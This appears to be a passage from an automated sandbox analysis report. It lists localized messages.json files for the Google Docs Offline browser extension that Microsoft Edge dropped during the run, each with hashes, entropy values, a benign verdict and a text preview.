                                                                                                                                                                                                                                                                              SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):884
                                                                                                                                                                                                                                                                              Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                              MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                              SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                              SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                              SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):980
                                                                                                                                                                                                                                                                              Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                              MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                              SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                              SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                              SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1941
                                                                                                                                                                                                                                                                              Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                              MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                              SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                              SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                              SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1969
                                                                                                                                                                                                                                                                              Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                              MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                              SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                              SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                              SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1674
                                                                                                                                                                                                                                                                              Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                              MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                              SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                              SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                              SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1063
                                                                                                                                                                                                                                                                              Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                              MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                              SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                              SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                              SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1333
                                                                                                                                                                                                                                                                              Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                              MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                              SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                              SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                              SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1263
                                                                                                                                                                                                                                                                              Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                              MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                              SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                              SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                              SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1074
                                                                                                                                                                                                                                                                              Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                              MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                              SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                              SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                              SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):879
                                                                                                                                                                                                                                                                              Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                              MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                              SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                              SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                              SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1205
                                                                                                                                                                                                                                                                              Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                              MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                              SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                              SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                              SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):843
                                                                                                                                                                                                                                                                              Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                              MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                              SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                              SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                              SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):912
                                                                                                                                                                                                                                                                              Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                              MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                              SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                              SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                              SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):11406
                                                                                                                                                                                                                                                                              Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                              MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                              SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                              SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                              SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                              Malicious:false
